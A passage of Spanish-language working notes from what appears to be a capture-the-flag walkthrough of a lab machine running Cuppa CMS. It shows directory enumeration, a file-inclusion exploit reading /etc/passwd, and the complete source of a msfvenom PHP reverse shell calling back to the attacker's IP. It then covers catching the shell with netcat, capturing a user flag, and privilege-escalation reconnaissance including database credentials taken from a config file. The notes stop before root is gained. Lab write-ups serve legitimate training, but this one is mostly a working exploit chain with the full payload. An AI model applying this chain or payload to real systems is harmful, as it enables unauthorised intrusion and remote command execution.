------------------------- GOBUSTER   --------------------------




INTENAMOS BUSCAR MAS RUTAS A PARTIR DEL DIRECTORIO OCULTO ENCONTARDO EN SMBCLIENT DE MILESDYSON:




gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt



BINGO NUESTRA ÑLOGICA FUNCVIONO; A PARTIR DE ESE DIRECTO OCULTO GOBUSTER ENCONTRO UN DIRECTORIO ADMINISTRATOR  :D  :



┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.37.103/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.37.103/45kra24zxs28v3yd/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/03 18:03:52 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/administrator        (Status: 301) [Size: 337] [--> http://10.10.37.103/45kra24zxs28v3yd/administrator/]
/index.html           (Status: 200) [Size: 418]
===============================================================
2024/02/03 18:03:53 Finished
================================




BIGO NOS LLEVO A UN LOGIN DE CUPPA CMS PROBAREMOS LOGEARNOS CON LO QUE TENEMOS HASTA AHORA:



http://10.10.37.103/45kra24zxs28v3yd/administrator/


WEB:




Use a valid username and password to gain access to the administrator
Username	
Password	



ENCONTRAMOS UN PANEL COMENTADO DE UNA RECUPERACION DE CONTRASEÑA APARENTEMNTE:

<!--
            	<a class="forgot_password" onclick="ShowPanel('forget')">Forgot Password?</a>
            -->




PROBAMOS DESCOMENTANDO ESTE BOTOS <a> Y NOS APARECE EN EL FORM EL BOTON PARA RECUPERAR LA CONTRASEÑA, PERO NOS FIJAMOS EN EL MAIL DE SQUIRRELMAIL Y NO NOS LLEGA NADA AUN ; VIENDO EN EL PANEL DE MAIL CONFIRMAMOS QUE EL MAIL DE RECUOPERACION NUESTRO LO ESTAMOS PONIENDO BIEN milesdyson@skynet , PERO AUN NO NOS LLEGA EL MAIL DE PASSWD, INTENTAMOS DE NUEVO VER SI LLEGABA ALGO A SSH, POP3 , IMAP, SMB Y NADA; ALGO NO ESTA FUNCIONANDO COMO SE DEBE AL MOMENTO DE RECUPERAR LA CONTRASEÑLA:





Current Folder: INBOX 	Sign Out
Compose   Addresses   Folders   Options   Search   Help  	SquirrelMail


Viewing Full Header - View message
Return-Path: <skynet@skynet>
X-Original-To: milesdyson
Delivered-To: milesdyson@skynet
Received: from localhost (localhost [127.0.0.1])
     by skynet (Postfix) with SMTP id C1C36111
     for <milesdyson>; Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
Subject: Samba Password reset
Message-Id: <20190918031102.C1C36111@skynet>
Date: Tue, 17 Sep 2019 22:10:55 -0500 (CDT)
From: skynet@skynet



NO LOGRAMOS QUE NOS MANDE EL MAIL DE CAMBIO DE CONTRASEÑA...  :(


-------------- PROBANDO EL SCRIPT DEL EXPLOIT , Y MANUALMENTE LA INCLUSION DE ARCHIVOS LFI TENIENDO EXITO LO LEEMOS DESE EL BROWSER Y CON CURL TAMBIEN  -----



curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?

http://10.10.37.103/45kra24zxs28v3yd/administrator/alertConfigField.php%20?urlConfig=/../../../../etc/passwd




LEEMOS EL ETC/PASSWD POR LFI:


http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/passwd




RESULTADO:



Field configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false messagebus:x:107:111::/var/run/dbus:/bin/false uuidd:x:108:112::/run/uuidd:/bin/false dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false postfix:x:113:121::/var/spool/postfix:/bin/false mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false



TRATAMOS DE LEER ETC/SHADOW:


http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../../../etc/shadow


NO ARROJA INFO POR QUE SEGURO NO TENEMOS PRIVILEGIOS.



----



┌──(root㉿kali)-[~]
└─# curl -s --data-urlencode urlConfig=../../../../../../../../../../../etc/passwd http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?
<script>
        function CloseDefaultAlert(){
                SetAlert(false, "", "#alert");
                setTimeout(function () {SetBlockade(false)}, 200);
        }
        function ShowAlert(){
                _width = '';
                _height = '';
                jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
                        function CompleteAnimation(){
                                jQuery("#btnClose_alert").css('visibility', "visible");
                                jQuery("#description_alert").css('visibility', "visible");
                                jQuery("#content_alert").css('visibility', "visible");
                        }
        }
</script>
<div class="alert_config_field" id="alert" style="z-index:;">
    <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
        <div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
    <div class="separator" style="margin-bottom:15px;"></div>
    <div id="content_alert" class="content_alert">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>  




---------- TRATAMOS E PASAR A UN RFI PARA INCLUIR NUESTRO ARCHIVO DE SHELL REVERSA QUE CREAMOS CON MSFCONSOLE CON NUESTRA IP Y PUERTO:  --------------------------------------------------






MESVENOM:



┌──(root㉿kali)-[~]
└─# msfvenom -p php/reverse_php LHOST=10.10.76.203 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3046 bytes
    /*<?php /**/
      @error_reporting(0);
      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
      $dis=@ini_get('disable_functions');
      if(!empty($dis)){
        $dis=preg_replace('/[, ]+/', ',', $dis);
        $dis=explode(',', $dis);
        $dis=array_map('trim', $dis);
      }else{
        $dis=array();
      }
      
    $ipaddr='10.10.76.203';
    $port=4444;

    if(!function_exists('eiMIFOUfpKRJ')){
      function eiMIFOUfpKRJ($c){
        global $dis;
        
      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
        $c=$c." 2>&1\n";
      }
      $AOXWF='is_callable';
      $KNHExnS='in_array';
      
      if($AOXWF('proc_open')and!$KNHExnS('proc_open',$dis)){
        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
        $o=NULL;
        while(!feof($pipes[1])){
          $o.=fread($pipes[1],1024);
        }
        @proc_close($handle);
      }else
      if($AOXWF('exec')and!$KNHExnS('exec',$dis)){
        $o=array();
        exec($c,$o);
        $o=join(chr(10),$o).chr(10);
      }else
      if($AOXWF('popen')and!$KNHExnS('popen',$dis)){
        $fp=popen($c,'r');
        $o=NULL;
        if(is_resource($fp)){
          while(!feof($fp)){
            $o.=fread($fp,1024);
          }
        }
        @pclose($fp);
      }else
      if($AOXWF('system')and!$KNHExnS('system',$dis)){
        ob_start();
        system($c);
        $o=ob_get_contents();
        ob_end_clean();
      }else
      if($AOXWF('passthru')and!$KNHExnS('passthru',$dis)){
        ob_start();
        passthru($c);
        $o=ob_get_contents();
        ob_end_clean();
      }else
      if($AOXWF('shell_exec')and!$KNHExnS('shell_exec',$dis)){
        $o=shell_exec($c);
      }else
      {
        $o=0;
      }
    
        return $o;
      }
    }
    $nofuncs='no exec functions';
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
      $s=@fsockopen("tcp://10.10.76.203",$port);
      while($c=fread($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=eiMIFOUfpKRJ(substr($c,0,-1));
          if($out===false){
            fwrite($s,$nofuncs);
            break;
          }
        }
        fwrite($s,$out);
      }
      fclose($s);
    }else{
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
      @socket_connect($s,$ipaddr,$port);
      @socket_write($s,"socket_create");
      while($c=@socket_read($s,2048)){
        $out = '';
        if(substr($c,0,3) == 'cd '){
          chdir(substr($c,3,-1));
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
          break;
        }else{
          $out=eiMIFOUfpKRJ(substr($c,0,-1));
          if($out===false){
            @socket_write($s,$nofuncs);
            break;
          }
        }
        @socket_write($s,$out,strlen($out));
      }
      @socket_close($s);
    }
         
         
         
SERVIDOR PYTHON SIRVIENDOMJKMI ARCHIVO PARA COMPARTIRLO POR LA URL VULNERABLE DEL SERVICIO CUPPA:

┌──(root㉿kali)-[~]
└─# python3 -m http.server 8080                                              
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...






URL PAR INCLUIR NUESTRO ARCHIVO DE SHELL REVERSA A CUPPA Y SE EJECUTA AL INSTANTE QUE SE ENVIA YA ESTANDO A ALA ESCUCHA CON NUESTRO LISTENER DE NETCAT:





http://10.10.37.103/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.76.203:8080/shell.php
         
         
         
         
         
BINGO SE TENZO ESCUCHAMOS LA CONECCION REVERSA DE NUESTRO SHELL:PHP CARGADO EN CUPPA POR LA BULNERABILIDAD DE RFI:

:D


┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.76.203] from (UNKNOWN) [10.10.37.103] 40220
whoami
www-data
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
milesdyson:x:1001:1001:,,,:/home/milesdyson:/bin/bash
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
postfix:x:113:121::/var/spool/postfix:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false




CONSEGUIMOS LA BANDERA FLAG DE USUARIO MILESDYSON SE SIGUE TENZANDO:



ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
cd ..
cd ..
cd ..
ls
45kra24zxs28v3yd
admin
ai
config
css
image.png
index.html
js
style.css
pwd
/var/www/html
cd ..
pwd
/var/www
ls
html
cd ..
ls
backups
cache
crash
lib
local
lock
log
mail
opt
run
snap
spool
tmp
www
cd ..
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd home
ls
milesdyson
cd mylesdyson
ls
milesdyson
pwd
/home
cd milesdyson
ls
backups
mail
share
user.txt
cat user.txt
7ce5c2109a40f958099283600a9ae807



-------------------  ESCALADA DE PRIVILEGIOS       --------------------------



VAMOS A PIOR LA DE ROOT:



 VEMOS LOS BINARIOS CON BITSUID:
  
  
  
  
  find / -type f -perm -04000 -ls 2>/dev/null
   279429     36 -rwsr-xr-x   1 root     root        35600 Mar  6  2017 /sbin/mount.cifs
   260157     40 -rwsr-xr-x   1 root     root        40152 May 16  2018 /bin/mount
   277101     32 -rwsr-xr-x   1 root     root        30800 Jul 12  2016 /bin/fusermount
   260206     28 -rwsr-xr-x   1 root     root        27608 May 16  2018 /bin/umount
   260171     44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
   260188     40 -rwsr-xr-x   1 root     root        40128 May 16  2017 /bin/su
   260172     44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
   260602     56 -rwsr-xr-x   1 root     root        54256 May 16  2017 /usr/bin/passwd
   264411    136 -rwsr-xr-x   1 root     root       136808 Jun 10  2019 /usr/bin/sudo
   260591     40 -rwsr-xr-x   1 root     root        39904 May 16  2017 /usr/bin/newgrp
   260525     76 -rwsr-xr-x   1 root     root        75304 May 16  2017 /usr/bin/gpasswd
   292080     24 -rwsr-xr-x   1 root     root        23376 Mar 27  2019 /usr/bin/pkexec
   260464     40 -rwsr-xr-x   1 root     root        40432 May 16  2017 /usr/bin/chsh
   277225     36 -rwsr-xr-x   1 root     root        32944 May 16  2017 /usr/bin/newgidmap
   279238     52 -rwsr-sr-x   1 daemon   daemon      51464 Jan 14  2016 /usr/bin/at
   277224     36 -rwsr-xr-x   1 root     root        32944 May 16  2017 /usr/bin/newuidmap
   260462     52 -rwsr-xr-x   1 root     root        49584 May 16  2017 /usr/bin/chfn
   260424     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   277205     40 -rwsr-xr-x   1 root     root          38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   292076     16 -rwsr-xr-x   1 root     root          14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   260788     12 -rwsr-xr-x   1 root     root          10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   279893    100 -rwsr-sr-x   1 root     root          98472 Mar 18  2019 /usr/lib/snapd/snap-confine
   277718    420 -rwsr-xr-x   1 root     root         428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   
   
   
   
-----------------   

VEMOS LAS VARIABLÑES DE ENTORNO:



env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts



--------------


VEMOS LAS TAREAS PROGRAMADAS CRONHOBS:


cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )



INTENTAR HACER QUE EJECUTE EL ARCHIVO POR ROOT CON LAS CRONHOBS:

echo "/bin/bash > backup.sh



-----------


VEMOS EL ARCHIVO CONFIG.PHP


pwd
/var/www/html/45kra24zxs28v3yd/administrator

   
cat Configuration.php
<?php 
        class Configuration{
                public $host = "localhost";
                public $db = "cuppa";
                public $user = "root";
                public $password = "password123";
                public $table_prefix = "cu_";
                public $administrator_template = "default";
                public $list_limit = 25;
                public $token = "OBqIPqlFWf3X";
                public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
                public $upload_default_path = "media/uploadsFiles";
                public $maximum_file_size = "5242880";
                public $secure_login = 0;
                public $secure_login_value = "";
                public $secure_login_redirect = "";
        } 




VEMOS LOS DIRECTORIOS ESCRIBIBLES:




find / -writable 2>/dev/null
/home/milesdyson/.bash_history
/tmp
/tmp/.Test-unix
/tmp/.ICE-unix
/tmp/.font-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/sys/kernel/security/apparmor/.null
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
/sys/fs/cgroup/memory/user.slice/cgroup.event_control
/sys/fs/cgroup/memory/init.scope/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dovecot.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-disk-by\x2duuid-354616bf\x2d923c\x2d43d3\x2da040\x2dae36babbbab3.swap/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/postfix.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/winbind.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ifup@eth0.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/lib/systemd/system/reboot.service
/lib/systemd/system/mountall-bootclean.service
/lib/systemd/system/rmnologin.service
/lib/systemd/system/umountfs.service
/lib/systemd/system/stop-bootlogd-single.service
/lib/systemd/system/mountkernfs.service
/lib/systemd/system/stop-bootlogd.service
/lib/systemd/system/checkroot-bootclean.service
/lib/systemd/system/samba.service
/lib/systemd/system/single.service
/lib/systemd/system/bootmisc.service
/lib/systemd/system/mountnfs-bootclean.service
/lib/systemd/system/mountnfs.service
/lib/systemd/system/killprocs.service
/lib/systemd/system/bootlogd.service
/lib/systemd/system/mountall.service
/lib/systemd/system/hwclock.service
/lib/systemd/system/cryptdisks-early.service
/lib/systemd/system/checkfs.service
/lib/systemd/system/cryptdisks.service
/lib/systemd/system/rcS.service
/lib/systemd/system/checkroot.service
/lib/systemd/system/hostname.service
/lib/systemd/system/rc.service
/lib/systemd/system/screen-cleanup.service
/lib/systemd/system/umountnfs.service
/lib/systemd/system/halt.service
/lib/systemd/system/sendsigs.service
/lib/systemd/system/umountroot.service
/lib/systemd/system/mountdevsubfs.service
/lib/systemd/system/motd.service
/lib/systemd/system/lvm2.service
/lib/systemd/system/bootlogs.service
/lib/systemd/system/fuse.service
/lib/systemd/system/x11-common.service
/dev/mqueue
/dev/log
/dev/shm
/dev/char/5:0
/dev/char/5:2
/dev/char/10:200
/dev/char/10:229
/dev/char/1:5
/dev/char/1:9
/dev/char/1:8
/dev/char/1:3
/dev/char/1:7
/dev/stderr
/dev/stdout
/dev/stdin
/dev/fd
/dev/net/tun
/dev/ptmx
/dev/fuse
/dev/tty
/dev/urandom
/dev/random
/dev/full
/dev/zero
/dev/null
/var/tmp
/var/lib/squirrelmail/data
/var/lib/lxcfs/proc
/var/lib/lxcfs/cgroup
/var/lib/php/sessions
/var/spool/squirrelmail/attach
/var/spool/postfix/dev/urandom
/var/spool/postfix/dev/random
/var/spool/postfix/dev/log
/var/spool/samba
/var/cache/apache2/mod_cache_disk
/var/crash
/var/www/html
/var/www/html/js
/var/www/html/index.html
/var/www/html/45kra24zxs28v3yd
/var/www/html/45kra24zxs28v3yd/index.html
/var/www/html/45kra24zxs28v3yd/miles.jpg
/var/www/html/45kra24zxs28v3yd/administrator
/var/www/html/45kra24zxs28v3yd/administrator/js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.md5.js
